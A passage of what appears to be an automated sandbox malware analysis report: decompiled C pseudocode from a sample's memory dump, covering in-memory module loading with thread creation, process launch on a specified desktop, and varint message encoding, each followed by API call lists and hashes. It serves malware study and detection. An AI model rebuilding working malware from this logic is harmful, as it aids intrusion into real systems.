						HeapFree(GetProcessHeap(), 0, _t32);
						goto L5;
					}
					_t25 =  *0x138cbd4; // 0x0
					 *_t32 = _t25;
					 *0x138cbd4 = _t32;
					return _t25;
				}
			}

0x0138a692
0x0138a6a4
0x0138a6aa
0x0138a6ae
0x0138a743
0x0138a6b4
0x0138a6b6
0x0138a6bb
0x0138a6be
0x0138a6be
0x0138a6c1
0x0138a6c7
0x0138a6d1
0x0138a6eb
0x0138a6ef
0x0138a731
0x00000000
0x0138a73b
0x0138a701
0x0138a704
0x0138a70a
0x0138a70f
0x0138a72b
0x00000000
0x0138a72b
0x0138a711
0x0138a716
0x0138a718
0x0138a720
0x0138a720

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,0138A87A,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A69D
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0138A6A4
memcpy.NTDLL(00000010,?,?,?,00000000,0138A87A,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A6D1
GetProcessHeap.KERNEL32(00000008,0000000C,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A6DE
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0138A6E5
CreateThread.KERNEL32(00000000,00000000,0138A3A0,00000000,00000000,00000000), ref: 0138A704
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A724
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A72B
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A734
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A73B

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree$CreateThreadmemcpy
String ID:
API String ID: 1978610079-0
Opcode ID: 60c9b98e67efc2448181127dba83ede535ccd585d8299cbe74645f2988a603bc
Instruction ID: 7a54cf12e19474596b8780736e40a5243676d95d496464ea87314334f9ca70c5
Opcode Fuzzy Hash: 60c9b98e67efc2448181127dba83ede535ccd585d8299cbe74645f2988a603bc
Instruction Fuzzy Hash: E1210D75640701AFE7206F69E859F8ABBA8FF44711F109519FA5AC7684CB70E450CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01381C50, Relevance: 10.6, APIs: 7, Instructions: 97
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E01381C50(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v524;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t31;
				int _t32;
				void* _t35;
				intOrPtr* _t36;

				_t35 = 0;
				_v12 = 0x200;
				_t36 = __ecx;
				_t31 = __edx;
				_v8 = __edx;
				memset(__ecx, 0, 0x14);
				_push( &_v12);
				_push( &_v524);
				_push(0);
				if( *0x138c0cc() >= 0) {
					_t32 = MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, 0, 0);
					if(_t32 != 0) {
						_t35 = RtlAllocateHeap(GetProcessHeap(), 8, _t32 + _t32);
						if(_t35 != 0) {
							MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, _t35, _t32);
						}
					}
					_t31 = _v8;
				}
				 *_t36 =  *0x138c244(_t35, 0, 0, 0, 0);
				HeapFree(GetProcessHeap(), 0, _t35);
				_t19 =  *_t36;
				if(_t19 == 0) {
					L9:
					return 0;
				} else {
					_t21 =  *0x138c254(_t19, _t31, _a4, 0, 0, 3, 0, 0);
					 *((intOrPtr*)(_t36 + 4)) = _t21;
					if(_t21 == 0) {
						 *0x138c234( *_t36);
						goto L9;
					} else {
						 *((intOrPtr*)(_t36 + 0xc)) = 3;
						return 1;
					}
				}
			}

0x01381c5e
0x01381c60
0x01381c67
0x01381c69
0x01381c6d
0x01381c70
0x01381c7c
0x01381c83
0x01381c84
0x01381c8d
0x01381ca2
0x01381ca6
0x01381cbb
0x01381cbf
0x01381cd0
0x01381cd0
0x01381cbf
0x01381cd6
0x01381cd6
0x01381ceb
0x01381cf4
0x01381cfa
0x01381cfe
0x01381d39
0x01381d3f
0x01381d00
0x01381d0f
0x01381d15
0x01381d1a
0x01381d31
0x00000000
0x01381d1d
0x01381d1d
0x01381d2e
0x01381d2e
0x01381d1a

APIs

memset.NTDLL ref: 01381C70
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01381C9C
GetProcessHeap.KERNEL32(00000008,00000000), ref: 01381CAE
RtlAllocateHeap.NTDLL(00000000), ref: 01381CB5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01381CD0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01381CED
HeapFree.KERNEL32(00000000), ref: 01381CF4

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$ByteCharMultiProcessWide$AllocateFreememset
String ID:
API String ID: 4040929015-0
Opcode ID: ffee8363ca3980d5caa62fb5c6089184913551a5f71bbb9e11e31a5b13e022e0
Instruction ID: 445c6bcc12063f45b3c836c691deb0170361639bf2fb0147b6272fa281020640
Opcode Fuzzy Hash: ffee8363ca3980d5caa62fb5c6089184913551a5f71bbb9e11e31a5b13e022e0
Instruction Fuzzy Hash: C1317E71600304BBFB305FA9AC89FABBBBCEB85B11F100169FA14D61C4DB7099418B70

Uniqueness

Uniqueness Score: -1.00%

Function 01389F80, Relevance: 9.2, APIs: 6, Instructions: 199
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01389F80(intOrPtr* __ecx, unsigned int* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				long _t50;
				signed char _t61;
				signed char _t63;
				signed char _t65;
				signed char _t67;
				signed char _t69;
				intOrPtr _t71;
				intOrPtr* _t72;
				int _t73;
				int _t74;
				int _t75;
				intOrPtr _t77;
				signed char _t78;
				signed char _t80;
				signed char _t82;
				signed char _t84;
				signed char _t86;
				intOrPtr _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				int _t93;
				signed char* _t94;
				void* _t95;
				intOrPtr _t96;
				char* _t99;
				signed char* _t100;
				signed char* _t101;
				void* _t102;
				char* _t103;
				signed char* _t104;
				void* _t105;
				char* _t106;
				signed char* _t107;
				void* _t108;
				char* _t109;
				signed char* _t110;

				_t94 = __edx;
				_v16 = __ecx;
				_t96 = 1;
				_v12 = 1;
				_t37 =  *__edx;
				if(_t37 > 0x7f) {
					do {
						_t37 = _t37 >> 7;
						_t96 = _t96 + 1;
					} while (_t37 > 0x7f);
					_v12 = _t96;
				}
				_t4 =  &(_t94[8]); // 0x0
				_t38 =  *_t4;
				_t77 = 1;
				while(_t38 > 0x7f) {
					_t38 = _t38 >> 7;
					_t77 = _t77 + 1;
				}
				_t5 =  &(_t94[0x18]); // 0x0
				_t39 =  *_t5;
				_t89 = 1;
				while(_t39 > 0x7f) {
					_t39 = _t39 >> 7;
					_t89 = _t89 + 1;
				}
				_t6 =  &(_t94[0x20]); // 0x0
				_t40 =  *_t6;
				_t71 = 1;
				while(_t40 > 0x7f) {
					_t40 = _t40 >> 7;
					_t71 = _t71 + 1;
				}
				_t7 =  &(_t94[0x28]); // 0x0
				_t41 =  *_t7;
				_v8 = 1;
				while(_t41 > 0x7f) {
					_v8 = _v8 + 1;
					_t41 = _t41 >> 7;
				}
				_t11 =  &(_t94[0x28]); // 0x0
				_t12 =  &(_t94[0x20]); // 0x0
				_t13 =  &(_t94[0x18]); // 0x0
				_t14 =  &(_t94[8]); // 0x0
				_t72 = _v16;
				_t50 =  *_t11 +  *_t12 +  *_t13 +  *_t14 + _v8 + _t71 + _t89 + _t77 + _v12 + 0xf;
				 *(_t72 + 4) = _t50;
				_t99 = RtlAllocateHeap(GetProcessHeap(), 0, _t50);
				 *_t72 = _t99;
				if(_t99 != 0) {
					 *_t99 = 8;
					_t100 = _t99 + 1;
					_t78 =  *_t94;
					while(_t78 > 0x7f) {
						_t69 = _t78;
						_t78 = _t78 >> 7;
						 *_t100 = _t69 | 0x00000080;
						_t100 =  &(_t100[1]);
					}
					 *_t100 = _t78 & 0x0000007f;
					_t100[1] = 0x12;
					_t101 =  &(_t100[2]);
					_t20 =  &(_t94[8]); // 0x0
					_t73 =  *_t20;
					_t80 = _t73;
					_t21 =  &(_t94[4]); // 0x0
					_t90 =  *_t21;
					if(_t73 > 0x7f) {
						do {
							_t67 = _t80;
							_t80 = _t80 >> 7;
							 *_t101 = _t67 | 0x00000080;
							_t101 =  &(_t101[1]);
						} while (_t80 > 0x7f);
					}
					 *_t101 = _t80 & 0x0000007f;
					_t102 =  &(_t101[1]);
					memcpy(_t102, _t90, _t73);
					_t103 = _t102 + _t73;
					 *_t103 = 0x1d;
					_t22 =  &(_t94[0xc]); // 0x0
					 *(_t103 + 1) =  *_t22;
					 *((char*)(_t103 + 5)) = 0x25;
					_t25 =  &(_t94[0x10]); // 0x0
					 *(_t103 + 6) =  *_t25;
					 *((char*)(_t103 + 0xa)) = 0x2a;
					_t104 = _t103 + 0xb;
					_t28 =  &(_t94[0x18]); // 0x0
					_t74 =  *_t28;
					_t82 = _t74;
					_t29 =  &(_t94[0x14]); // 0x0
					_t91 =  *_t29;
					if(_t74 > 0x7f) {
						do {
							_t65 = _t82;
							_t82 = _t82 >> 7;
							 *_t104 = _t65 | 0x00000080;
							_t104 =  &(_t104[1]);
						} while (_t82 > 0x7f);
					}
					 *_t104 = _t82 & 0x0000007f;
					_t105 =  &(_t104[1]);
					memcpy(_t105, _t91, _t74);
					_t106 = _t105 + _t74;
					 *_t106 = 0x32;
					_t107 = _t106 + 1;
					_t30 =  &(_t94[0x20]); // 0x0
					_t75 =  *_t30;
					_t84 = _t75;
					_t31 =  &(_t94[0x1c]); // 0x0
					_t92 =  *_t31;
					if(_t75 > 0x7f) {
						do {
							_t63 = _t84;
							_t84 = _t84 >> 7;
							 *_t107 = _t63 | 0x00000080;
							_t107 =  &(_t107[1]);
						} while (_t84 > 0x7f);
					}
					 *_t107 = _t84 & 0x0000007f;
					_t108 =  &(_t107[1]);
					memcpy(_t108, _t92, _t75);
					_t109 = _t108 + _t75;
					 *_t109 = 0x3a;
					_t110 = _t109 + 1;
					_t32 =  &(_t94[0x28]); // 0x0
					_t93 =  *_t32;
					_t86 = _t93;
					_t33 =  &(_t94[0x24]); // 0x0
					_t95 =  *_t33;
					if(_t93 > 0x7f) {
						do {
							_t61 = _t86;
							_t86 = _t86 >> 7;
							 *_t110 = _t61 | 0x00000080;
							_t110 =  &(_t110[1]);
						} while (_t86 > 0x7f);
					}
					 *_t110 = _t86 & 0x0000007f;
					memcpy( &(_t110[1]), _t95, _t93);
					_t72 = _v16;
				}
				return 0 |  *_t72 != 0x00000000;
			}

0x01389f89
0x01389f8b
0x01389f8e
0x01389f93
0x01389f96
0x01389f9b
0x01389fa0
0x01389fa0
0x01389fa3
0x01389fa4
0x01389fa9
0x01389fa9
0x01389fac
0x01389fac
0x01389faf
0x01389fb7
0x01389fc0
0x01389fc3
0x01389fc4
0x01389fc9
0x01389fc9
0x01389fcc
0x01389fd4
0x01389fd6
0x01389fd9
0x01389fda
0x01389fdf
0x01389fdf
0x01389fe2
0x01389fea
0x01389ff0
0x01389ff3
0x01389ff4
0x01389ff9
0x01389ff9
0x01389ffc
0x0138a006
0x0138a010
0x0138a013
0x0138a016
0x0138a01b
0x0138a01e
0x0138a021
0x0138a024
0x0138a02f
0x0138a039
0x0138a03e
0x0138a04e
0x0138a050
0x0138a054
0x0138a05a
0x0138a05d
0x0138a05e
0x0138a063
0x0138a065
0x0138a067
0x0138a06c
0x0138a06e
0x0138a06f
0x0138a077
0x0138a079
0x0138a07d
0x0138a080
0x0138a080
0x0138a083
0x0138a085
0x0138a085
0x0138a08b
0x0138a090
0x0138a090
0x0138a092
0x0138a097
0x0138a099
0x0138a09a
0x0138a090
0x0138a0a3
0x0138a0a5
0x0138a0a8
0x0138a0ae
0x0138a0b3
0x0138a0b6
0x0138a0b9
0x0138a0bc
0x0138a0c0
0x0138a0c3
0x0138a0c6
0x0138a0ca
0x0138a0cd
0x0138a0cd
0x0138a0d0
0x0138a0d2
0x0138a0d2
0x0138a0d8
0x0138a0e0
0x0138a0e0
0x0138a0e2
0x0138a0e7
0x0138a0e9
0x0138a0ea
0x0138a0e0
0x0138a0f3
0x0138a0f5
0x0138a0f8
0x0138a0fe
0x0138a103
0x0138a106
0x0138a107
0x0138a107
0x0138a10a
0x0138a10c
0x0138a10c
0x0138a112
0x0138a114
0x0138a114
0x0138a116
0x0138a11b
0x0138a11d
0x0138a11e
0x0138a114
0x0138a127
0x0138a129
0x0138a12c
0x0138a132
0x0138a137
0x0138a13a
0x0138a13b
0x0138a13b
0x0138a13e
0x0138a140
0x0138a140
0x0138a146
0x0138a148
0x0138a148
0x0138a14a
0x0138a14f
0x0138a151
0x0138a152
0x0138a148
0x0138a15b
0x0138a160
0x0138a166
0x0138a169
0x0138a179

APIs

GetProcessHeap.KERNEL32(00000000,00000001,?,000DBBA0), ref: 0138A041
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0138A048
memcpy.NTDLL(00000000,00000000,00000000,?,000DBBA0), ref: 0138A0A8

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessmemcpy
String ID:
API String ID: 1874444438-0
Opcode ID: 09ca014b6ceb562512a7016fbbd2eed186cd0222932d7e7e112aee15a8c2bd09
Instruction ID: fb127a118987f069d89c5a6e7deae65598a0f916ed51d12af3ca0368b475b098
Opcode Fuzzy Hash: 09ca014b6ceb562512a7016fbbd2eed186cd0222932d7e7e112aee15a8c2bd09
Instruction Fuzzy Hash: FF61C4709007519FE7248F1DC4C079AFBE4FF66758F38456DE8898BB02C324A996D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01388990, Relevance: 9.1, APIs: 6, Instructions: 95
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01388990(signed char __ecx, void* __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed char _v16;
				intOrPtr _v20;
				void* _v24;
				char _v28;
				signed char _t25;
				void* _t31;
				intOrPtr _t34;
				void* _t36;
				void _t38;
				signed char _t39;
				signed char _t41;
				signed int _t47;
				intOrPtr _t50;
				void* _t51;
				signed char _t52;

				_t52 = __ecx;
				_t50 = __ecx + __edx;
				_v8 = _t50;
				while(1) {
					_t47 = 0;
					_t41 = 0;
					_v12 = 0;
					_t39 = 0x80;
					if(_t52 >= _t50) {
						goto L6;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t39 =  *_t52;
						_t52 = _t52 + 1;
						_t47 = _t47 | (_t39 & 0x7f) << _t41;
						if(_t39 >= 0) {
							break;
						}
						_t41 = _t41 + 7;
						if(_t52 < _t50) {
							continue;
						}
						break;
					}
					_v12 = _t47;
					L6:
					_t25 =  !((_t39 & 0x000000ff) >> 7);
					if((_t25 & 0x00000001) != 0) {
						_t25 = _t47 + _t52;
						if(_t25 <= _t50) {
							_v16 = _t52;
							_t52 = _t25;
							_t25 = E013887C0( &_v16,  &_v28);
							if(_t25 != 0) {
								_t51 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
								if(_t51 == 0) {
									L1:
									_t50 = _v8;
									continue;
								} else {
									_t31 = E01381F40(_v24, _v20);
									 *(_t51 + 8) = _t31;
									if(_t31 == 0) {
										L15:
										HeapFree(GetProcessHeap(), 0, _t51);
										goto L1;
									} else {
										_t34 = _t31 +  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x3c)) + _t31 + 0x28));
										 *((intOrPtr*)(_t51 + 0xc)) = _t34;
										if(_t34 == 0) {
											L14:
											VirtualFree( *(_t51 + 8), 0, 0x8000);
											goto L15;
										} else {
											_t36 = CreateThread(0, 0, E01388880, _t51, 0, 0);
											 *(_t51 + 0x10) = _t36;
											if(_t36 == 0) {
												goto L14;
											} else {
												 *((intOrPtr*)(_t51 + 4)) = _v28;
												_t38 =  *0x138c274; // 0x0
												 *_t51 = _t38;
												 *0x138c274 = _t51;
												goto L1;
											}
										}
									}
								}
								L17:
							}
						}
					}
					return _t25;
					goto L17;
				}
			}

0x01388998
0x0138899b
0x0138899e
0x013889a6
0x013889a6
0x013889a8
0x013889aa
0x013889ad
0x013889b1
0x00000000
0x00000000
0x00000000
0x00000000
0x013889b3
0x013889b3
0x013889b3
0x013889b5
0x013889be
0x013889c2
0x00000000
0x00000000
0x013889c4
0x013889c9
0x00000000
0x00000000
0x00000000
0x013889c9
0x013889cb
0x013889ce
0x013889d4
0x013889d8
0x013889de
0x013889e3
0x013889e9
0x013889f2
0x013889f4
0x013889fb
0x01388a12
0x01388a16
0x013889a3
0x013889a3
0x00000000
0x01388a18
0x01388a1e
0x01388a23
0x01388a28
0x01388a7b
0x01388a85
0x00000000
0x01388a2a
0x01388a31
0x01388a33
0x01388a36
0x01388a6b
0x01388a75
0x00000000
0x01388a38
0x01388a46
0x01388a4c
0x01388a51
0x00000000
0x01388a53
0x01388a56
0x01388a59
0x01388a5e
0x01388a60
0x00000000
0x01388a60
0x01388a51
0x01388a36
0x01388a28
0x00000000
0x01388a16
0x013889fb
0x013889e3
0x01388a96
0x00000000
0x01388a96

APIs

GetProcessHeap.KERNEL32(00000008,00000014,?,000DBBA0,?,?,?,?,?,?,?,01388F82), ref: 01388A05
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 01388A0C
CreateThread.KERNEL32(00000000,00000000,01388880,00000000,00000000,00000000), ref: 01388A46
VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,?,?,?,?,?,?,01388F82), ref: 01388A75
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F82), ref: 01388A7E
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F82), ref: 01388A85

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$AllocateCreateThreadVirtual
String ID:
API String ID: 1073023709-0
Opcode ID: 1451e8c379b2d24f7d7fe2a85a38006b3437bfe47534797d4d36ce94ff61489e
Instruction ID: ce3c3a9f70fdf00670dcdbe73326ca2e33eaf8e2d4f398aa59f27da128d0e836
Opcode Fuzzy Hash: 1451e8c379b2d24f7d7fe2a85a38006b3437bfe47534797d4d36ce94ff61489e
Instruction Fuzzy Hash: 37312671A00706AFEB20EF69DC81BADBBB8FB84704F608195E645D7284EB70D501CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01382180, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80
memoryprocessCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E01382180(WCHAR* __ecx, void* _a4, struct _PROCESS_INFORMATION* _a8) {
				char _v8;
				struct _STARTUPINFOW _v76;
				int _t29;
				WCHAR* _t31;
				int _t35;
				void* _t36;

				_t35 = 0;
				_t31 = __ecx;
				memset( &_v76, 0, 0x44);
				_t36 = _a4;
				_v76.cb = 0x44;
				if(_t36 == 0) {
					return CreateProcessW(0, _t31, 0, 0, 0, 0, 0, 0,  &_v76, _a8);
				} else {
					_t5 = _t35 + 0x10; // 0x10
					E01381830(0x1381030, _t5, 0x47deb7fb,  &_a4);
					_v76.lpDesktop = _a4;
					_push(0);
					_push(_t36);
					_push( &_v8);
					if( *0x138c21c() != 0) {
						_t29 =  *0x138c04c(_t36, 0, _t31, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a8);
						_t35 = _t29;
						 *0x138c220(_v8);
					}
					HeapFree(GetProcessHeap(), 0, _a4);
					return _t35;
				}
			}

0x0138218b
0x01382192
0x01382194
0x0138219a
0x013821a0
0x013821a9
0x0138223e
0x013821ab
0x013821b9
0x013821bc
0x013821c7
0x013821cd
0x013821ce
0x013821cf
0x013821d8
0x013821f0
0x013821f9
0x013821fb
0x013821fb
0x0138220d
0x0138221b
0x0138221b

APIs

memset.NTDLL ref: 01382194
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,0138A52C), ref: 01382232

Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B

GetProcessHeap.KERNEL32(00000000,00000000), ref: 01382206
HeapFree.KERNEL32(00000000), ref: 0138220D

Strings

D, xrefs: 013821A0

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCreateFreememset
String ID: D
API String ID: 3667606640-2746444292
Opcode ID: d7d6f02533d4208528d4a382c3498071d5bde514703330069120f383454c7008
Instruction ID: eccc0156d36230ac0f5a03b0db367f9e63f51f2f7ac3ea8e0a8d04eaf22dd66a
Opcode Fuzzy Hash: d7d6f02533d4208528d4a382c3498071d5bde514703330069120f383454c7008
Instruction Fuzzy Hash: 36113D76600208BBEB209BA5EC49EDF7F7CEF85759F044025FA08D6240D7319A56CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 013823F0, Relevance: 7.6, APIs: 5, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 01382422
RtlAllocateHeap.NTDLL(00000000), ref: 01382429
memcpy.NTDLL(01388583,?,?), ref: 01382467
GetProcessHeap.KERNEL32(00000000,01388583), ref: 0138250A
HeapFree.KERNEL32(00000000), ref: 01382511

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: 423b1149bf7f29224d21783e6e7134c66954502093222355b790a37c85fb3783
Instruction ID: 30868caf2d34c043d93202e7be4dc595b7e30c91ea79da43be8247ca21f0e06d
Opcode Fuzzy Hash: 423b1149bf7f29224d21783e6e7134c66954502093222355b790a37c85fb3783
Instruction Fuzzy Hash: 68411A71900209AFEF219FA9DC44FEEBBBDEB44344F144169E905E7191E7719A04DB60

Uniqueness

Uniqueness Score: -1.00%

Function 01382530, Relevance: 7.6, APIs: 5, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,01388644,?), ref: 0138256D
RtlAllocateHeap.NTDLL(00000000), ref: 01382574
memcpy.NTDLL(01388644,?,?), ref: 013825AE
GetProcessHeap.KERNEL32(00000000,01388644), ref: 0138260C
HeapFree.KERNEL32(00000000), ref: 01382613

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: fb3d07f5e898688fa684bf29db55acbe2e0670a7da12661c6e6ad2fbf9000c9e
Instruction ID: 1a8df21d2ab5dc25194601ba05bd75fb0358700e5e25bec9f14942bc045ab614
Opcode Fuzzy Hash: fb3d07f5e898688fa684bf29db55acbe2e0670a7da12661c6e6ad2fbf9000c9e
Instruction Fuzzy Hash: C9318E71640305BFEB219FA8EC85B9EBBBDFB08758F200161FA05E6190D7719A50DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01388290, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01388290(int* __ecx, signed int _a8) {
				intOrPtr _t66;
				int* _t88;
				signed int _t89;
				void* _t90;

				_t89 = _a8;
				_t88 = __ecx;
				 *__ecx = 0;
				__ecx[1] = 0;
				__ecx[2] = _t89;
				__ecx[3] = (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20 >> 0x1f) + (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20) + 1;
				__ecx[5] = _t89 >> 0x0000000e & 0x00000001;
				__ecx[4] = (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20 >> 0x1f) + 1 + (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20);
				if((_t89 & 0x00008000) == 0) {
					_t17 = _t88 + 0x29272; // 0x29272
					memset(_t17, 0, 0x10000);
					_t90 = _t90 + 0xc;
				}
				_t18 = _t88 + 0x9273; // 0x9273
				 *(_t88 + 0x44) = 0;
				 *((intOrPtr*)(_t88 + 0x28)) = _t18;
				_t21 = _t88 + 0x9272; // 0x9272
				 *((intOrPtr*)(_t88 + 0x2c)) = _t21;
				_t23 = _t88 + 0x39272; // 0x39272
				_t66 = _t23;
				 *((intOrPtr*)(_t88 + 0x30)) = _t66;
				 *((intOrPtr*)(_t88 + 0x34)) = _t66;
				_t26 = _t88 + 0x8192; // 0x8192
				 *(_t88 + 0x40) = 0;
				 *(_t88 + 0x3c) = 0;
				 *(_t88 + 0x24) = 0;
				 *(_t88 + 0x20) = 0;
				 *(_t88 + 0x1c) = 0;
				 *(_t88 + 0x68) = 0;
				 *(_t88 + 0x48) = 0;
				 *(_t88 + 0x64) = 0;
				 *(_t88 + 0x60) = 0;
				 *(_t88 + 0x5c) = 0;
				 *(_t88 + 0x58) = 0;
				 *((intOrPtr*)(_t88 + 0x38)) = 8;
				 *(_t88 + 0x6c) = 0;
				 *(_t88 + 0x54) = 0;
				 *(_t88 + 0x50) = 0;
				 *(_t88 + 0x4c) = 0;
				 *((intOrPtr*)(_t88 + 0x18)) = 1;
				 *(_t88 + 0x70) = 0;
				 *(_t88 + 0x74) = 0;
				 *(_t88 + 0x78) = 0;
				 *(_t88 + 0x7c) = 0;
				 *(_t88 + 0x80) = 0;
				 *(_t88 + 0x84) = 0;
				 *(_t88 + 0x88) = 0;
				 *(_t88 + 0x8c) = 0;
				memset(_t26, 0, 0x240);
				_t52 = _t88 + 0x83d2; // 0x83d2
				memset(_t52, 0, 0x40);
				return 0;
			}

0x01388294
0x013882aa
0x013882bc
0x013882c2
0x013882c9
0x013882cc
0x013882d4
0x013882ef
0x013882f8
0x013882ff
0x01388308
0x0138830e
0x0138830e
